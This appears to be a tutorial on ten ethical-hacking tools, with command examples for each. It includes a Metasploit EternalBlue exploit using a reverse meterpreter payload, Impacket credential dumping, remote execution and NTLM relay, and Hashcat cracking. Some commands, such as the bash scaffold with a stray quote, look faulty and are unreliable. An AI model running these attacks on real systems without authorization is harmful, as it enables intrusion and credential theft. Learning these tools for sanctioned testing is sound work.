How to evaluate and safely use cybersecurity tools in 2025
Evaluation criteria that matter in 2025
Ethical hacking is fast-moving, and tool choice impacts speed, depth, and safety of your assessments. In 2025, prioritize tools that are actively maintained, scriptable, and integrate cleanly into CI/CD and cloud-native workflows. Look for projects with transparent release notes, reproducible builds, and robust documentation. Favor tools with machine-readable output (JSON, CSV, JUnit XML) you can parse in pipelines and feed into issue trackers, SIEMs, and dashboards. Assess community health: active issues, PR velocity, and template/rule ecosystems (for scanners like Nuclei). Finally, ensure legal fit: tools should support safe modes, rate limiting, and scoping controls to avoid collateral damage during engagements.
Security programs are also “shift-left” and “shift-cloud.” That means your go-to set must cover on-prem networks, identity systems, web apps/APIs, and major clouds. Evaluate how easily a tool runs in containers, supports Linux/macOS/Windows, and scales across a distributed runner fleet. Performance characteristics matter for large attack surfaces: does the tool support parallelism, batching, caching, and resumable runs? Equally important is signal-to-noise: choose tools with tunable heuristics and suppression mechanisms so output turns into prioritized findings rather than alert fatigue.
Finally, ethics and authorization are non-negotiable. Every technique described here is for sanctioned testing under written permission. Use provider- and customer-approved scope definitions, safety guardrails (low-impact payloads, time windows), and immediate stop conditions. Log your commands, hashes, and timestamps for auditability. When in doubt, ask for explicit scope approval before touching high-risk techniques like NTLM relaying, password cracking, or service exploitation.
Build a safe, authorization-first lab
Before pointing any tool at production, reproduce targets in an isolated lab that mirrors your customer’s tech stack. Start with a virtualization host (or cloud tenancy) and build four zones: attacker workstation, target network, identity/AD, and internet simulation. Use Infrastructure as Code (IaC) to stand up ephemeral environments so you can reset quickly after destructive tests. Populate realistic datasets (sample users, rotated secrets, small web apps) and seed known weaknesses you can verify as ground truth.
# Example lab layout (ASCII)
# [Attacker] ---- Mgmt VLAN ---- [Jump Box]
# | |
# Test VLAN -------------------- [AD/DC + FileSrv]
# | |
# Web/App Subnet --------------- [Apps + APIs]
# |
# Cloud Sandbox (AWS/Azure/GCP) --> Shared test accounts
Instrument the lab with logging: Sysmon on Windows, Zeek on the span port, and a minimal SIEM stack (e.g., OpenSearch) to correlate tool actions with defensive telemetry. Add a TLS interception proxy for egress tests and a sinkhole DNS to prevent accidental calls to real domains. Establish an approval checklist: scope, change window, blast radius analysis, rollback plan, and notification contacts. This discipline is what separates professional ethical hackers from opportunistic testing.
1) Nmap: the foundation of network reconnaissance
What it does and why it matters in 2025
Nmap remains the gold standard for host discovery, port scanning, service/version detection, and lightweight vulnerability probing via the Nmap Scripting Engine (NSE). In 2025, it’s still the fastest way to turn unknown IP space into an actionable service inventory. Hybrid networks haven’t made this obsolete: Nmap identifies internet-exposed services, on-prem east-west exposures, and misconfigured edge devices. The NSE library provides targeted checks (SSL/TLS info, SMB enumeration, HTTP metadata) without the overhead of a full vulnerability scanner. Because it’s scriptable, portable, and respectful of rate limits, Nmap fits both recon phases and continuous monitoring jobs.
Two modern use cases stand out. First, continuous external attack surface management (EASM) pipelines use Nmap as a verification step to confirm target liveness and service banners after subdomain enumeration. Second, secure network segmentation validation: scan known allowlists and choke points during change windows to verify only intended ports are reachable. Nmap’s granular timing options and host grouping make it safe to operate under sensitive maintenance windows, and its structured greppable or XML output feeds downstream parsers and dashboards.
Hands-on workflow, flags, and gotchas
Start wide, then go deep. Begin with host discovery, pivot to TCP SYN scans on alive hosts, then enrich with version detection and NSE scripts scoped to your engagement rules.
# 1) Host discovery (no port scan)
nmap -sn 10.10.0.0/24 -oA discover
# 2) Fast top-ports scan on discovered hosts
nmap -Pn -T4 --top-ports 1000 -sS -oA top1k -iL discover.gnmap
# 3) Service/version detection + OS guess
nmap -sS -sV -O -T3 -oA svc_os -iL top1k.gnmap
# 4) Focused NSE scripts (http, ssl, smb as permitted)
# Use --script-help <name> to understand impact first
nmap -p 80,443 --script http-title,http-headers -oA http -iL svc_os.gnmap
nmap -p 445 --script smb-enum-shares,smb2-security-mode -oA smb -iL svc_os.gnmap
# 5) XML to HTML report (xsltproc or ndiff for diffs)
xsltproc svc_os.xml -o svc_os.html
Gotchas: avoid aggressive timing (-T5) on fragile networks. Treat UDP scans as long-running and targeted; consider -sU on short port lists (e.g., 53, 123, 161). Validate host discovery on cloud targets where ICMP may be blocked (-Pn if needed). Use exclude files to honor scope. Always document scripts used, versions, and timestamps so operations teams can reproduce what you saw.
2) Wireshark: deep protocol analysis for truth on the wire
What it does and why it matters in 2025
Wireshark is the definitive packet analyzer. For ethical hackers, it’s invaluable when “the app says X, but the wire says Y.” From TLS handshakes to HTTP/2 framing, SMB dialect negotiation, and DNSSEC behavior, Wireshark reveals implementation flaws, misconfigurations, and risky defaults. In 2025, complex microservice mesh traffic and encrypted-by-default stacks make selective decryption and precise filtering essential. Wireshark’s modern display filters, protocol dissectors, and PCAP-NG metadata provide that precision.
It’s not just for forensics; use it proactively to validate findings. Example: a claimed TLS 1.2-only posture might still accept TLS 1.0 on a legacy VIP—Wireshark shows that immediately. API testers can verify H/2 downgrades, header normalization, and JWT leaks. In internal tests, you can confirm NTLM fallback, SMB signing behavior, or Kerberos ticket exchanges. The tool’s extensibility (Lua dissectors, extcap) means you can instrument unique lab setups and data sources without switching tools.
Hands-on workflow: filters, keys, and validation
Capture minimally, filter maximally, and document rigorously. Prefer capture filters to trim data at the source, then refine with display filters for analysis.
# Start capture on a specific interface with BPF filter (CLI tshark example)
tshark -i eth0 -f "tcp port 443 or tcp port 80" -w web.pcapng
# Common display filters
http.request or http.response
ssl.handshake or tls.handshake
ip.addr == 10.10.0.5 and tcp.port == 445
# Decrypt TLS when you control client: set SSLKEYLOGFILE and import into Wireshark
export SSLKEYLOGFILE=$HOME/sslkeys.log
# Launch browser or test client, then in Wireshark: Preferences -> TLS -> (Pre)-Master-Secret log
# Follow a flow and export payload
Right-click packet -> Follow -> TCP Stream -> Save As
Gotchas: don’t indiscriminately capture sensitive production data; use ring buffers and narrow capture filters. Verify that time is synchronized (NTP) across systems to align with app logs. For encrypted protocols you can’t decrypt, focus on metadata: JA3/JA4 fingerprints, SNI, ALPN, and timing. Always secure your PCAPs at rest; they frequently contain secrets and PII and should be handled under your data handling policy.
3) Burp Suite: the web and API testing workbench
What it does and why it matters in 2025
Burp Suite remains the most widely adopted interactive workbench for web application and API security testing. Its intercepting proxy, request editors (Repeater/Intruder), crawler, passive/active scanners (Pro), Collaborator for out-of-band detection, and specialized tooling like DOM Invader make it a one-stop shop for modern web engagements. In 2025, APIs (REST/GraphQL/gRPC), single-page apps, and complex authentication flows require tooling that can capture, replay, fuzz, and script traffic across browsers, mobile devices, and automation harnesses.
Burp’s extension ecosystem (BApp Store) fills gaps with add-ons for JWT analysis, GraphQL introspection, and HTTP/2/3 behaviors. With proper scoping, rate limiting, and collaboration features, Burp scales from single tester sessions to team projects. For regulated environments, use Burp’s logging and project files to produce reproducible evidence, and combine with source-of-truth traffic captures from proxies or service meshes for cross-validation.
Hands-on workflow: from intercept to evidence
Set up, scope, then iterate. Start by configuring Burp as a proxy, import target scope, and map the application before active testing.
# 1) Proxy setup
# - Configure browser to use 127.0.0.1:8080 (FoxyProxy recommended)
# - Install Burp CA cert in the browser for TLS interception
# 2) Define scope precisely (Target -> Scope)
# Include only authorized domains/paths to avoid collateral traffic
# 3) Crawl and passively analyze
# Use Burp's crawler or manual browsing to build the Site map
# 4) Reproduce issues reliably
# Send requests to Repeater to tweak headers/payloads
# Use Intruder for parameter fuzzing with throttling
# 5) Out-of-band checks (if allowed)
# Collaborator for SSRF/blind XSS callbacks; log all interactions
# 6) Export evidence
# Save Request/Response pairs, project file, and issue descriptions
Gotchas: throttle active scanning to respect rate limits and SLAs, especially on APIs and third-party integrations. Handle tokens safely—avoid storing long-lived credentials in project files. For SPAs, use the in-browser Burp extension or integration with an instrumented Chromium to catch DOM-based vulnerabilities missed by server-side scans. Keep a clean proxy history and blacklist non-scope domains (like CDNs) to reduce noise and risk.
4) Metasploit Framework: modular exploitation and post-exploitation
What it does and why it matters in 2025
Metasploit Framework provides a vast library of auxiliary scanners, exploits, payloads, and post-exploitation modules in a consistent, scriptable interface. For ethical hackers, it accelerates proof-of-concept validation: once a vulnerability is suspected (e.g., SMB signing off + known CVE), a curated module can safely check or exploit under controlled conditions. In 2025, its value is in repeatability and auditability: workspaces, loot management, and logs enable precise, evidentiary testing that you can replay in a lab or during remediation validation.
While zero-days and vendor-specific exploits move fast, Metasploit’s structured modules remain a baseline for common misconfigurations and N-day vulnerabilities. Its integration with external scanners and wordlists, plus support for staged and stageless payloads, keeps it relevant. Use it to validate exposure chains end-to-end: discovery, exploitation, session management, and minimal post-exploitation required to prove impact without causing damage.
Hands-on workflow: a safe, reproducible run
Use workspaces per engagement, log everything, and favor check-safe modules when available.
# 1) Launch and set workspace
msfconsole -q
workspace -a q1-external
# 2) Search and info
search type:auxiliary smb signing
use auxiliary/scanner/smb/smb2
set RHOSTS 10.10.0.0/24
run
# 3) Validate a known vulnerability (check method if available)
search ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.10.0.0/24
run
# 4) Exploit a single authorized host (only with written approval)
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.0.5
set PAYLOAD windows/x64/meterpreter/reverse_https
set LHOST 10.10.0.9
run
# 5) Export loot and logs
loot
sessions -l
Gotchas: keep modules updated and verify references before use; some exploits require exact target builds. Favor “check” modes and auxiliary scanners to minimize risk. Never run wide-impact modules (e.g., broadcast or worm-like behavior) on production networks. Document stop conditions and rollback plans before exploitation.
5) BloodHound (+ SharpHound/AzureHound): attacking paths in Active Directory
What it does and why it matters in 2025
BloodHound models Active Directory (AD) and Azure AD relationships as a graph, revealing attack paths such as privilege escalation, lateral movement, and shadow admin exposure. In 2025, identity attacks continue to dominate incident reports, and BloodHound remains the most effective way to make complex trust relationships visible. Its collectors (SharpHound for on-prem AD, AzureHound for Microsoft Entra ID/Azure AD) gather edges like group membership, session data, ACLs, and role assignments that create real-world opportunities for escalation—even when traditional vulnerability scans are clean.
Use BloodHound to answer: “What is the shortest path from a compromised workstation user to Domain Admin?” or “Which Azure app registrations have permissions enabling tenant-wide data exposure?” The graph context is actionable for defenders too: you can remove edges (permissions, groups) that form dangerous paths. For ethical hackers, it provides clear, defensible remediation items that map directly to identity controls.
Hands-on workflow: collection to path proofs
Collect minimally, analyze precisely, and demonstrate impact with the least intrusive steps.
# 1) On a domain-joined host, collect AD data (authorized account)
SharpHound.exe -c All --zipfilename collect.zip
# Or PowerShell module variant with scoped collection
# Invoke-BloodHound -CollectionMethod ACL,Group,Session -OutputDirectory .
# 2) For Azure AD (Microsoft Entra ID)
AzureHound --tenant <tenant.onmicrosoft.com> --username user@tenant --auth-type device
# 3) Ingest and query
# Launch BloodHound (Community Edition) UI and import zip
# Run queries like:
# - Shortest paths to Domain Admins
# - Find computers where domain users have local admin
# - Kerberoastable users
# Example path (ASCII)
[WS-User] --> (Local Admin) --> [Server01]
| |
| (RDP Allowed) | (Admin to)
v v
[HelpdeskGroup] ------------> [BackupAdmins] --> (WriteDACL) --> [Domain Admins]
Gotchas: session collection can be noisy; narrow to specific subnets or OUs when possible. Handle data exports securely—they often contain sensitive relationships and names. Always get explicit approval before demonstrating lateral movement. Use read-only credentials, and avoid techniques that alter directory state (e.g., writing SPNs) unless the scope explicitly permits.
6) Impacket: Swiss-army toolkit for Windows protocols
What it does and why it matters in 2025
Impacket is a Python toolkit with utilities for working with Windows network protocols (SMB, MSRPC, Kerberos, LDAP). It’s ubiquitous in internal assessments because it enables authenticated and relay-based techniques to validate real risks: password reuse, missing SMB signing, Kerberos misconfigurations, and unsafe delegation. In 2025, it remains the de facto standard for precise protocol interactions during identity-centric testing, with tools like secretsdump.py
, psexec.py
, wmiexec.py
, smbclient.py
, and ntlmrelayx.py
.
Used responsibly, Impacket demonstrates impact with minimal footprint. For example, secretsdump.py
reads from the registry to extract local SAM hashes or, with DCSync privileges, domain secrets; wmiexec.py
provides command execution over WMI without writing a persistent service. ntlmrelayx.py
validates whether SMB/HTTP relay is possible and whether signing and protections like EPA/Channel Binding are enforced.
Hands-on workflow: authenticated checks and safe relays
Favor authenticated validation first. Only perform relay tests when scope permits and after confirming signing settings.
# 1) Check SMB signing and list shares (authenticated preferred)
smbclient.py DOMAIN/user:Passw0rd@10.10.0.15 -list
# 2) Extract local hashes from a workstation (authorized, on-box or remote if allowed)
secretsdump.py -local -just-dc-user '' -target 127.0.0.1
# Remote against target with admin rights
secretsdump.py DOMAIN/user:Passw0rd@10.10.0.42
# 3) Remote command execution without service install (WMI)
wmiexec.py DOMAIN/user:Passw0rd@10.10.0.42 "whoami && hostname"
# 4) Validate NTLM relay possibility (lab-only unless explicit approval)
# Typically paired with a capture (e.g., via network poisoning) and a relay to SMB/LDAP
ntlmrelayx.py -t ldap://10.10.0.10 -smb2support --no-http-server
# NTLM relay data flow (ASCII)
Victim --NTLMv2--> Attacker (relay) --NTLMv2--> Target LDAP/SMB
^ |
|----------------------- Response --------------------|
Gotchas: relays can have side effects if you write changes in LDAP or install services—prefer “check-only” or read-only operations to prove risk. Strictly adhere to authorization, and avoid poisoning techniques on production networks without explicit windows and monitoring. Log all commands, hashes, and results; securely delete sensitive data after reporting.
7) Hashcat: GPU-accelerated password cracking and auditing
What it does and why it matters in 2025
Hashcat is the industry-standard GPU-accelerated password cracker used for credential strength assessments and password policy validation. In 2025, password spraying and credential stuffing remain common attacker techniques, making proactive password audits essential. Hashcat supports a wide range of hash types (Windows NTLM, modern KDFs, WPA-EAPOL/PMKID) and efficient attack modes (dictionary, rules, masks, hybrid, combinator). For ethical hackers, Hashcat provides quantifiable metrics: time-to-crack estimates, recovered rates, and insights that drive policy changes (length requirements, blocklists, MFA prioritization).
Because password cracking handles sensitive material, it demands strict handling: explicit authorization, offline-only cracking against hashes you are permitted to use, secure storage for wordlists and results, and immediate disposal post-engagement. Integrate Hashcat output with reporting to show business impact: for example, percent of service accounts with passwords cracked under one day on commodity GPUs.
Hands-on workflow: efficient, responsible audits
Start with targeted wordlists and rules aligned to the organization’s context (brand words, seasonal patterns), then escalate to masks and hybrids if needed.
# 1) Identify hash mode (e.g., NTLM is -m 1000). Verify before running.
# See: hashcat --example-hashes | less
# 2) Basic dictionary attack with rules
hashcat -m 1000 hashes.txt rockyou.txt -r rules/best64.rule -O --status
# 3) Mask attack for policy-aligned patterns (e.g., 8-char with capital+digits)
hashcat -m 1000 hashes.txt -a 3 '?u?l?l?l?l?l?d?d' --increment --status
# 4) Resumable sessions and potfile management
hashcat --session audit_q1 -S ...
hashcat --restore --session audit_q1
# 5) Report generation: cracked vs total
cut -d: -f1 cracked.txt | sort -u | wc -l
Gotchas: never attempt online brute force; only test against hashes or lab-auth endpoints in scope. Avoid over-optimizing rules that explode keyspace without benefit; use statistics from previous cracks to tune. Respect GPU thermals and power limits when running long jobs. Hashcat’s potfile stores cleartext—protect and purge it according to your data retention policy.
8) OWASP Amass: attack surface and asset discovery
What it does and why it matters in 2025
OWASP Amass is a comprehensive framework for DNS-based asset discovery and external attack surface mapping. In 2025, organizations operate sprawling multi-cloud, multi-domain estates; asset inventory gaps are still a leading root cause of exposures. Amass aggregates passive sources, performs active enumeration (bruteforce, permutations), resolves DNS, and correlates IPs and ASN data to map reachable surface area. It’s scriptable, supports configuration of API keys for data sources, and outputs machine-readable graphs.
Amass excels as the first stage of EASM workflows: enumerate subdomains, filter for resolvable records, enrich with HTTP probing, and hand off to scanners like Nuclei. Its graph outputs (Graphviz, JSON) help stakeholders visualize ownership and risky overlaps across brands and third parties. Because it can be aggressive if misconfigured, it’s important to tune sources and wordlists and limit brute force on fragile or third-party infrastructure.
Hands-on workflow: enumerate, resolve, verify
Build a layered enumeration: passive first, then focused active steps. Always respect scope by listing authorized domains and excluding third-party platforms when required.
# 1) Passive enumeration
amass enum -passive -d example.com -o passive.txt
# 2) Active enumeration with wordlist and permutations (tune rate)
amass enum -active -brute -d example.com -o active.txt -w wordlists/subs.txt
# 3) Resolve and deduplicate
sort -u passive.txt active.txt > subs.txt
amass resolve -rf resolvers.txt -o resolved.txt -df subs.txt
# 4) Visualize graph (optional)
amass viz -d3 -dir . -d example.com -o amass_graph.json
# 5) Hand-off to HTTP probing and scanners
httpx -silent -l resolved.txt -threads 50 -o live_hosts.txt
# External discovery pipeline (ASCII)
[Amass Passive] --> [Amass Active] --> [Resolve] --> [HTTP Probe] --> [Scan]
Gotchas: respect robots on discovery endpoints and avoid hammering DNS providers. Configure API keys for high-quality passive sources to improve coverage. Carefully manage permutations—unbounded mutations create noise and risk rate limits. Store evidence (raw lists, resolvers, timestamps) to support reproducibility.
9) ScoutSuite: multi-cloud security posture assessment
What it does and why it matters in 2025
ScoutSuite is an open-source multi-cloud security auditing tool that inspects cloud configuration against best practices across AWS, Azure, and GCP. For ethical hackers, ScoutSuite provides breadth: a quick, read-only view of identity, network, storage, and logging settings in a tenant or account. In 2025, with cloud being the dominant hosting platform, you need a reliable way to identify misconfigurations like overly permissive IAM policies, public S3 buckets, exposed VM ports, weak logging, and risky service defaults before simulating exploitation paths.
ScoutSuite runs using cloud-native credentials (profiles, environment variables, or service principals) and produces an interactive HTML report that directs attention to high-risk findings with evidence and remediation guidance. It’s ideal early in an engagement to prioritize manual testing and as a validation step after remediation. Because it’s read-only, it’s safer than exploitation frameworks for initial scoping, and it integrates well with CI pipelines in security reviews.
Hands-on workflow: authenticated, read-only scanning
Prepare provider credentials scoped to read-only. Run targeted scans and export reports you can share with cloud engineers.
# 1) AWS example using a profile
scout aws --profile security-audit --report-dir ./reports/aws_acme
# 2) Azure example using a service principal
# AZURE_CLIENT_ID, AZURE_TENANT_ID, AZURE_CLIENT_SECRET must be set
scout azure --subscription <SUBSCRIPTION_ID> --report-dir ./reports/az_acme
# 3) GCP example using a service account key
export GOOGLE_APPLICATION_CREDENTIALS=$PWD/gcp-audit.json
scout gcp --project <PROJECT_ID> --report-dir ./reports/gcp_acme
# 4) Serve report locally for review
python3 -m http.server -d ./reports/aws_acme 8000
# Cloud audit flow (ASCII)
[Credential (read-only)] --> [ScoutSuite API calls] --> [HTML report]
| |
+----> [JSON findings for pipeline] <----+
Gotchas: ensure credentials are least-privilege and time-bound. Be careful with large organizations: API throttling can lengthen scans; plan windows accordingly. Confirm regional coverage—some services are region-specific. Treat findings as leads: verify true exposure (e.g., is a public bucket actually holding sensitive data?) before prioritizing remediation.
10) Nuclei: fast, templated vulnerability scanning
What it does and why it matters in 2025
Nuclei is a fast, templated scanner that uses YAML-based rules to detect misconfigurations and vulnerabilities across HTTP, DNS, TCP, and more. In 2025, its strength is the community-driven template ecosystem and performance: it allows ethical hackers to codify checks as code, reproduce them consistently, and run at scale across large target lists. Unlike black-box scanners that are opaque, Nuclei templates are transparent and auditable, making them suitable for regulated environments and CI pipelines as guardrails.
Nuclei shines in an EASM workflow after enumeration and HTTP probing: feed it live hosts and targeted templates (CVE, misconfig, exposures). Its rate limiting, concurrency controls, and fine-grained matchers reduce false positives when tuned correctly. Because templates are plain text, teams can version-control them, review diffs, and create custom detections for internal patterns.
Hands-on workflow: safe, focused scanning
Start with a curated template subset, run in info or low-impact modes, and gradually increase intensity. Always tag your runs and save raw JSON for evidence.
# 1) Update templates
nuclei -ut
# 2) Run curated CVE and exposure templates against live hosts
nuclei -l live_hosts.txt -as -tags cve,exposure -severity low,medium -o nuclei.out
# 3) JSON output for pipelines
nuclei -l live_hosts.txt -json -o nuclei.json -rl 100 -c 50
# 4) Custom template example (simplified)
# templates/custom/x-powered-by.yaml
id: tech-x-powered-by
info:
name: X-Powered-By header detected
severity: info
requests:
- method: GET
path:
- "{{BaseURL}}/"
matchers:
- type: word
part: header
words:
- "X-Powered-By"
# EASM loop (ASCII)
[Amass/Subfinder] -> [Resolve] -> [httpx] -> [Nuclei] -> [Manual review]
Gotchas: never run the entire template corpus blindly; you risk false positives and noisy findings. Tag and filter templates based on asset types and business context. Tune rate limits (-rl) and concurrency (-c) to avoid overwhelming targets. Store versions of templates used in your report to make results reproducible during remediation.
Putting it together: a repeatable ethical hacking workflow
End-to-end playbook you can automate
Combining the tools above yields a robust, repeatable pipeline. A typical external assessment starts with Amass enumeration, resolution, and HTTP probing. Nmap verifies service banners and non-HTTP ports. Nuclei runs curated template packs to surface likely exposures. Burp Suite focuses on the highest-value apps and APIs with manual testing and targeted fuzzing. Internally, Wireshark validates network behaviors; Impacket, BloodHound, and Hashcat address identity paths and password hygiene. ScoutSuite audits cloud configuration to close misconfigurations before exploitation is even necessary.
# Example automation scaffold (bash)
set -euo pipefail
DOMAIN=example.com
OUT=out_$(date +%F)
mkdir -p "$OUT"
amass enum -passive -d "$DOMAIN" -o "$OUT/passive.txt"
amass enum -active -brute -d "$DOMAIN" -o "$OUT/active.txt" -w wordlists/subs.txt"
sort -u "$OUT/passive.txt" "$OUT/active.txt" > "$OUT/subs.txt"
amass resolve -rf resolvers.txt -o "$OUT/resolved.txt" -df "$OUT/subs.txt"
httpx -silent -l "$OUT/resolved.txt" -o "$OUT/live.txt"
nmap -Pn -T4 --top-ports 1000 -sS -iL "$OUT/live.txt" -oX "$OUT/nmap.xml"
nuclei -l "$OUT/live.txt" -as -tags cve,exposure -json -o "$OUT/nuclei.json"
# Manual steps: Burp Suite deep testing on top apps from live.txt
# Internal/lab: Wireshark validation, Impacket checks, BloodHound collection
# Cloud: ScoutSuite per provider and share report
Critical practices: maintain target lists and tool versions in version control. Use containers for tool execution where possible to keep environments consistent. Capture raw outputs (PCAPs, XML, JSON) and derive human-readable reports from them to preserve evidence. Always obtain and document written authorization, scope, and data handling procedures before running anything against a customer’s environment.